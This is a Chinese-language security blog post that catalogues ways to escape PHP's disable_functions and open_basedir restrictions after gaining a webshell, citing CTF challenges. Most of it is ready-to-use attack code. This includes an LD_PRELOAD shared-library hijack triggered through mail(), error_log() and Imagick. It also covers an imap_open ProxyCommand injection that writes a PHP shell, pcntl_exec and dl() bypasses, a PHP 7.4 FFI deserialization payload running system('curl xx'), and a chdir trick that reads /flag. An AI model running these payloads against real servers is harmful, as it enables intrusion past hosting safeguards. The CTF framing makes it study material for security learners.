
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Bypass disabled_functions &amp; open_basedir-php | 离怀秋</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言很多情况下我们会遇到拿到webshell，却无法拿到我们想要数据的情况，被服务器所设置的open_basedir和disabled_functions所限制，下面写的就是一些bypass方法了。 bypass disabled_functions寻找遗漏危险函数一般被遗漏的危险函数都是如popen,proc_open(),pcntl_exec()这样的函数，比如在国决Day1的web11 ht">
<meta property="og:type" content="article">
<meta property="og:title" content="Bypass disabled_functions &amp; open_basedir-php">
<meta property="og:url" content="http://yoursite.com/2019/10/09/Bypass-disabled-functions-open-basedir-php/index.html">
<meta property="og:site_name" content="离怀秋">
<meta property="og:description" content="前言很多情况下我们会遇到拿到webshell，却无法拿到我们想要数据的情况，被服务器所设置的open_basedir和disabled_functions所限制，下面写的就是一些bypass方法了。 bypass disabled_functions寻找遗漏危险函数一般被遗漏的危险函数都是如popen,proc_open(),pcntl_exec()这样的函数，比如在国决Day1的web11 ht">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/03/uwQjHJ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/04/uB7xot.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/04/uD9rn0.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/04/uDmFeJ.png">
<meta property="og:image" content="https://s2.ax1x.com/2019/10/04/urkE4K.png">
<meta property="article:published_time" content="2019-10-09T10:19:15.000Z">
<meta property="article:modified_time" content="2019-10-09T10:22:20.000Z">
<meta property="article:author" content="离怀秋">
<meta property="article:tag" content="Web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.ax1x.com/2019/10/03/uwQjHJ.png">
  
    <link rel="alternative" href="/atom.xml" title="离怀秋" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
<link rel="stylesheet" href="/css/style.css">

  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
<meta name="generator" content="Hexo 4.2.1"></head>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">离怀秋</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">心未死 战未败</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//www.baidu.com/baidu" method="get" accept-charset="utf-8" class="search-form">
          <input type="search" name="word" maxlength="20" class="search-form-input" placeholder="Search">
          <input type="submit" value="" class="search-form-submit">
          <input name=tn type=hidden value="bds">
          <input name=cl type=hidden value="3">
          <input name=ct type=hidden value="2097152">
          <input type="hidden" name="si" value="yoursite.com">
        </form>
      </div>
    </div>
  </div>
</header>
    <div class="outer">
      <section id="main"><article id="post-Bypass-disabled-functions-open-basedir-php" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/10/09/Bypass-disabled-functions-open-basedir-php/" class="article-date">
  <time datetime="2019-10-09T10:19:15.000Z" itemprop="datePublished">2019-10-09</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Bypass disabled_functions &amp; open_basedir-php
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>很多情况下我们会遇到拿到webshell，却无法拿到我们想要数据的情况，被服务器所设置的open_basedir和disabled_functions所限制，下面写的就是一些bypass方法了。</p>
<h3 id="bypass-disabled-functions"><a href="#bypass-disabled-functions" class="headerlink" title="bypass disabled_functions"></a>bypass disabled_functions</h3><h4 id="寻找遗漏危险函数"><a href="#寻找遗漏危险函数" class="headerlink" title="寻找遗漏危险函数"></a>寻找遗漏危险函数</h4><p>一般被遗漏的危险函数都是如popen,proc_open(),pcntl_exec()这样的函数，比如在国决Day1的web11</p>
<p><a href="https://github.com/imagemlt/CISCN_2019_final_pmarkdown" target="_blank" rel="noopener">https://github.com/imagemlt/CISCN_2019_final_pmarkdown</a></p>
<p>在disabled_functions就存在未过滤popen的情况，这样最后就可以不用去引入恶意so了</p>
<p>下面是当时disabled_functions的内容</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,mail,passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen</span><br></pre></td></tr></table></figure>

<h4 id="利用LD-PRELOAD"><a href="#利用LD-PRELOAD" class="headerlink" title="利用LD_PRELOAD"></a>利用LD_PRELOAD</h4><h5 id="LD-PRELOAD"><a href="#LD-PRELOAD" class="headerlink" title="LD_PRELOAD"></a>LD_PRELOAD</h5><blockquote>
<p>在UNIX的动态链接库的世界中，LD_PRELOAD就是这样一个环境变量，它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数（无需别人的源码），而另一方面，我们也可以以向别人的程序注入恶意程序，从而达到那不可告人的罪恶的目的。</p>
</blockquote>
<p>从上面可以看出本来LD_PRELOAD的作用是利用我们加载进来的so，去覆盖相同函数名的库函数，去使用自己的函数，更加方便，但是如果自己的函数为恶意函数，就造成了恶意程序注入。</p>
<h5 id="动态链接与静态链接"><a href="#动态链接与静态链接" class="headerlink" title="动态链接与静态链接"></a>动态链接与静态链接</h5><blockquote>
<p>一般来说，程序的链接分为静态链接和动态链接，静态链接就是把所有所引用到的函数或变量全部地编译到可执行文件中。动态链接则不会把函数编译到可执行文件中，而是在程序运行时动态地载入函数库，也就是运行链接。所以，对于动态链接来说，必然需要一个动态链接库。动态链接库的好处在于，一旦动态库中的函数发生变化，对于可执行程序来说是透明的，可执行程序无需重新编译。这对于程序的发布、维护、更新起到了积极的作用。对于静态链接的程序来说，函数库中一个小小的改动需要整个程序的重新编译、发布，对于程序的维护产生了比较大的工作量。</p>
<p>有得就有失。动态链接所带来的坏处和其好处一样同样是巨大的。因为程序在运行时动态加载函数，这也就为他人创造了可以影响你的主程序的机会。试想，一旦，你的程序动态载入的函数不是你自己写的，而是载入了别人的有企图的代码，通过函数的返回值来控制你的程序的执行流程，那么，你的程序也就被人“劫持”了。</p>
</blockquote>
<p>可以看出虽然动态链接增添了很多方便，但同时也增加了不少风险度，比如我们可以引入自己的so文件，里面写好我们想要的执行内容的库函数，这样就会导致覆盖了原来正常的库函数，造成函数劫持</p>
<p>对LD_PRELOAD的利用大概可分为两种，第一种是劫持库函数，第二种是劫持启动进程</p>
<h5 id="劫持库函数"><a href="#劫持库函数" class="headerlink" title="劫持库函数"></a>劫持库函数</h5><p>网上大多数都是劫持的getuid，其实能劫持的并不只getuid,我们需要劫持的函数需要满足，此函数为点：<strong>经常被用到的并且为无参数的函数</strong></p>
<p>比如getuid,getpid,getgid,getppid这种，具体的可以fuzz一下，应该蛮多的</p>
<p>具体操作过程(以geteuid的劫持为例)</p>
<p>hack.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">payload</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        system(<span class="string">"whoami &gt; hack"</span>);</span><br><span class="line">&#125;   </span><br><span class="line"><span class="function"><span class="keyword">int</span>  <span class="title">geteuid</span><span class="params">()</span> </span>&#123;</span><br><span class="line"><span class="keyword">if</span> (getenv(<span class="string">"LD_PRELOAD"</span>) == <span class="literal">NULL</span>) &#123; <span class="keyword">return</span> <span class="number">0</span>; &#125;</span><br><span class="line">unsetenv(<span class="string">"LD_PRELOAD"</span>);</span><br><span class="line">payload();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译成so文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gcc -c -fPIC hack.c -o hack</span><br><span class="line">gcc --share hack -o hack.so</span><br></pre></td></tr></table></figure>

<p>写一个hack.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">putenv(<span class="string">"LD_PRELOAD=./hack.so"</span>);</span><br><span class="line">mail(<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>);<span class="comment">//error_log('',1);</span></span><br><span class="line"><span class="comment">//imap_mail('a@a',1,1,1,1);</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里能调用的函数不止有mail，在mail函数被ban掉的情况下也可以用error_log，imap_mail等，需要注意的是error_log的第二个参数需要设置为1表示发送邮件会调用sendmail进程，imap_mail也可调用sendmail进程，即可调用sendmail子进程，下面放一下对比图，就不演示具体的过程了</p>
<p><img src="https://s2.ax1x.com/2019/10/03/uwQjHJ.png" alt="uwQjHJ.png"></p>
<p>可以看到这里都调用了sendmail进程。</p>
<h5 id="劫持启动进程"><a href="#劫持启动进程" class="headerlink" title="劫持启动进程"></a>劫持启动进程</h5><p>从上面来看，劫持库函数需要找到特定的库函数去劫持，那么劫持新进程是不需要找到特定的库函数的。</p>
<blockquote>
<p>GCC 有个 C 语言扩展修饰符 <code>__attribute__((constructor))</code>，可以让由它修饰的函数在 main() 之前执行，若它出现在共享对象中时，那么一旦共享对象被系统加载，立即将执行 <code>__attribute__((constructor))</code> 修饰的函数。</p>
</blockquote>
<p>__attribute__((constructor))更加直接的去讲：有这个说明：</p>
<p><strong>它是在加载共享库时运行的，通常是在程序启动过程中</strong>，也就是当有一个新进程/子进程启动时，那么__attribute__((constructor))就会被直接加载，我们上面的mail等函数也正好符合这个特性，下面也接着来试一下</p>
<p>hack.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"></span><br><span class="line">__attribute__ ((__constructor__)) <span class="function"><span class="keyword">void</span> <span class="title">angel</span> <span class="params">(<span class="keyword">void</span>)</span></span>&#123;</span><br><span class="line">    unsetenv(<span class="string">"LD_PRELOAD"</span>);</span><br><span class="line">    system(<span class="string">"ls"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>hack.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">putenv(<span class="string">"LD_PRELOAD=./hack.so"</span>);</span><br><span class="line">error_log(<span class="string">''</span>,<span class="number">1</span>);</span><br></pre></td></tr></table></figure>

<p>运行，即可列目录</p>
<p>具有这种开一个新进程/子进程的函数还有其他的，比如imagick同样可以</p>
<p>test.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$img = <span class="keyword">new</span> Imagick(<span class="string">'test.wmv'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>新建一个test.wmv</p>
<p>看一下调用的新进程</p>
<p><img src="https://s2.ax1x.com/2019/10/04/uB7xot.png" alt="uB7xot.png"></p>
<p>从上面可以看出这里取调用了新进程ffmpeg进行处理</p>
<p>调用ffmpeg的还有以下几种后缀</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmv,mov,m4v,m2v,mp4,mpg,mpeg,mkv,avi,3g2,3gp</span><br></pre></td></tr></table></figure>

<p>引入恶意so进行一下实验</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">root@4c80e397e0b2:/<span class="comment"># php test.php</span></span><br><span class="line">bin   etc   hack.c   lib    mnt   readflag    run   sys       tmp</span><br><span class="line">boot  flag  hack.so  lib64  opt   readflag.c  sbin  test.php  usr</span><br><span class="line">dev   hack  home     media  proc  root        srv   test.wmv  var</span><br><span class="line">PHP Fatal error:  Uncaught ImagickException: unable to open image `/tmp/magick-709mqrbus4dKcZ0.pam<span class="string">': No such file or directory @ error/blob.c/OpenBlob/2701 in /test.php:3</span></span><br><span class="line"><span class="string">Stack trace:</span></span><br><span class="line"><span class="string">#0 /test.php(3): Imagick-&gt;__construct('</span>test.wmv<span class="string">')</span></span><br><span class="line"><span class="string">#1 &#123;main&#125;</span></span><br><span class="line"><span class="string">  thrown in /test.php on line 3</span></span><br></pre></td></tr></table></figure>

<p>可以看到成功列了目录</p>
<p>当然，其他后缀是可以调用其他的新进程</p>
<p>从kylingit这位师傅博客可以看到部分列举出来的常见调用依赖</p>
<table>
<thead>
<tr>
<th>EPI/EPS/PDF/PS</th>
<th><a href="http://www.cs.wisc.edu/~ghost" target="_blank" rel="noopener">Ghostscript</a></th>
</tr>
</thead>
<tbody><tr>
<td>MNG/M2V</td>
<td><a href="https://www.ffmpeg.org/download.html" target="_blank" rel="noopener">ffmpeg</a></td>
</tr>
<tr>
<td>JXR</td>
<td><a href="https://jxrlib.codeplex.com/" target="_blank" rel="noopener">jxrlib</a></td>
</tr>
</tbody></table>
<p>更详细的可以直接参考一下官网<a href="https://imagemagick.org/script/formats.php" target="_blank" rel="noopener">https://imagemagick.org/script/formats.php</a></p>
<p>下面以PDF为例验证</p>
<p><img src="https://s2.ax1x.com/2019/10/04/uD9rn0.png" alt="uD9rn0.png"></p>
<p>这里的imagick似乎是是有一个禁止调用的名单，这里写的是gs的禁止调用名单，需要把none改为read|write,接下来的程序正常进行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$img = <span class="keyword">new</span> Imagick(<span class="string">'test.pdf'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.ax1x.com/2019/10/04/uDmFeJ.png" alt="uDmFeJ.png"></p>
<p>成功进行命令执行。</p>
<p>可以用strace具体看一下调用进程</p>
<p><img src="https://s2.ax1x.com/2019/10/04/urkE4K.png" alt="urkE4K.png"></p>
<p>从上图可以明显的看到在处理pdf后缀的时候会调用ghostscript，这样就满足了新进程，从而加载了我们__attribute__ ((__constructor__))部分</p>
<h4 id="利用imap-open"><a href="#利用imap-open" class="headerlink" title="利用imap_open"></a>利用imap_open</h4><p>这个东西之前也写过，直接放下poc和以前的文章链接好了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">`<span class="meta">&lt;?php</span>$server = <span class="string">"any -o ProxyCommand=echo\t'\&lt;?php\tsystem(whoami);?&gt;'\t&gt;\t1.php"</span>;@imap_open(<span class="string">'&#123;'</span>.$server.<span class="string">'&#125;:143/imap&#125;INBOX'</span>, <span class="string">''</span>, <span class="string">''</span>);`</span><br></pre></td></tr></table></figure>

<p>一般利用imap进行bypass是没有回显的，所以一般把回显的结果写入文章内容</p>
<p>文章链接</p>
<p><a href="https://lihuaiqiu.github.io/2019/06/01/PHP邮件漏洞小结/" target="_blank" rel="noopener">https://lihuaiqiu.github.io/2019/06/01/PHP%E9%82%AE%E4%BB%B6%E6%BC%8F%E6%B4%9E%E5%B0%8F%E7%BB%93/</a></p>
<h4 id="pcntl插件-bypass"><a href="#pcntl插件-bypass" class="headerlink" title="pcntl插件 bypass"></a>pcntl插件 bypass</h4><p>载安装pcntl插件的情况下，可以通过pcntl进行bypass。</p>
<p>如果在查看phpinfo()种看到enable-pcntl，并且在disable_functions允许的情况下，可以通过下面poc bypass</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#exec.php</span></span><br><span class="line"><span class="meta">&lt;?php</span> pcntl_exec(<span class="string">"/bin/bash"</span>, <span class="keyword">array</span>(<span class="string">"/tmp/b4dboy.sh"</span>));&gt;</span><br><span class="line"><span class="comment">#/tmp/b4dboy.sh#!/bin/bash</span></span><br><span class="line">ls -l /</span><br></pre></td></tr></table></figure>

<h4 id="外部扩展库dl-bypass"><a href="#外部扩展库dl-bypass" class="headerlink" title="外部扩展库dl bypass"></a>外部扩展库dl bypass</h4><p>dl扩展库的详细安装过程</p>
<p><a href="http://reverse-tcp.xyz/php/pentest/2016/12/22/php-disabled_functions-bypass.html" target="_blank" rel="noopener">http://reverse-tcp.xyz/php/pentest/2016/12/22/php-disabled_functions-bypass.html</a></p>
<p>dl bypass-poc</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">dl(<span class="string">"dl.so"</span>);  <span class="comment">//dl.so在extension_dir目录，如不在则用../../来实现调用</span></span><br><span class="line">confirm_dl_compiled(<span class="string">"$_GET[a]&gt;;1.txt"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>主要就是dl.so这个文件的搜索，通过调用dl.so进行命令执行。</p>
<h4 id="PHP7-4-FFI-bypass"><a href="#PHP7-4-FFI-bypass" class="headerlink" title="PHP7.4-FFI bypass"></a>PHP7.4-FFI bypass</h4><p>在RCTF2019中出的题，考察了php7.4的新特性，通过新加的FFI即可bypass disable function</p>
<p>preload代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">final</span> <span class="class"><span class="keyword">class</span> <span class="title">A</span> <span class="keyword">implements</span> <span class="title">Serializable</span> </span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> $data = [</span><br><span class="line">        <span class="string">'ret'</span> =&gt; <span class="keyword">null</span>,</span><br><span class="line">        <span class="string">'func'</span> =&gt; <span class="string">'print_r'</span>,</span><br><span class="line">        <span class="string">'arg'</span> =&gt; <span class="string">'1'</span></span><br><span class="line">    ];</span><br><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">run</span> <span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;data[<span class="string">'ret'</span>] = <span class="keyword">$this</span>-&gt;data[<span class="string">'func'</span>](<span class="keyword">$this</span>-&gt;data[<span class="string">'arg'</span>]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__serialize</span><span class="params">()</span>: <span class="title">array</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;data;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__unserialize</span><span class="params">(array $data)</span> </span>&#123;</span><br><span class="line">    array_merge(<span class="keyword">$this</span>-&gt;data, $data);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;run();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">serialize</span> <span class="params">()</span>: <span class="title">string</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> serialize(<span class="keyword">$this</span>-&gt;data);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">unserialize</span><span class="params">($payload)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;data = unserialize($payload);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;run();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span> <span class="params">($key)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;data[$key];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__set</span> <span class="params">($key, $value)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> \<span class="keyword">Exception</span>(<span class="string">'No implemented'</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span> <span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> \<span class="keyword">Exception</span>(<span class="string">'No implemented'</span>);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>官方给的调用形式如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// create FFI object, loading libc and exporting function printf()</span></span><br><span class="line">$ffi = FFI::cdef(</span><br><span class="line">    <span class="string">"int printf(const char *format, ...);"</span>, <span class="comment">// this is a regular C declaration</span></span><br><span class="line">    <span class="string">"libc.so.6"</span>);</span><br><span class="line"><span class="comment">// call C's printf()</span></span><br><span class="line">$ffi-&gt;printf(<span class="string">"Hello %s!\n"</span>, <span class="string">"world"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>对于FFI::cdef中第二个参数不进行传参也可以，并且在php7.4中我们我们可以通过__unserialize和<em>\</em>serialize来控制自定义对象的序列化</p>
<p>最终poc</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">final</span> <span class="class"><span class="keyword">class</span> <span class="title">A</span> <span class="keyword">implements</span> <span class="title">Serializable</span> </span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> $data = [</span><br><span class="line">        <span class="string">'ret'</span> =&gt; <span class="keyword">null</span>,</span><br><span class="line">        <span class="string">'func'</span> =&gt; <span class="string">'FFI::cdef'</span>,</span><br><span class="line">        <span class="string">'arg'</span> =&gt; <span class="string">'int system(char *command);'</span></span><br><span class="line">    ];</span><br><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">run</span> <span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;data[<span class="string">'ret'</span>] = <span class="keyword">$this</span>-&gt;data[<span class="string">'func'</span>](<span class="keyword">$this</span>-&gt;data[<span class="string">'arg'</span>]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">serialize</span> <span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> serialize(<span class="keyword">$this</span>-&gt;data);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">unserialize</span><span class="params">($payload)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;data = unserialize($payload);</span><br><span class="line">    <span class="keyword">$this</span>-&gt;run();</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span>(serialize(<span class="keyword">new</span> A()));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$a&#x3D;unserialize(&#39;C:1:&quot;A&quot;:89:&#123;a:3:&#123;s:3:&quot;ret&quot;;N;s:4:&quot;func&quot;;s:9:&quot;FFI::cdef&quot;;s:3:&quot;arg&quot;;s:26:&quot;int system(char *command);&quot;;&#125;&#125;&#39;);$a-&gt;ret-&gt;system(&#39;curl xx&#39;);</span><br></pre></td></tr></table></figure>

<p>调用流程：反序列化触发__unserialize，通过调用不存在的变量名ret触发__get，最后进行FFI命令执行</p>
<h3 id="Bypass-open-basedir"><a href="#Bypass-open-basedir" class="headerlink" title="Bypass open_basedir"></a>Bypass open_basedir</h3><h4 id="chdir-bypass"><a href="#chdir-bypass" class="headerlink" title="chdir bypass"></a>chdir bypass</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mkdir(<span class="string">'/tmp/test'</span>);chdir(<span class="string">'/tmp/test/'</span>);ini_set(<span class="string">'open_basedir'</span>,<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);chdir(<span class="string">'..'</span>);ini_set(<span class="string">'open_basedir'</span>,<span class="string">'/'</span>);var_dump(file_get_contents(<span class="string">"/flag"</span>));</span><br></pre></td></tr></table></figure>

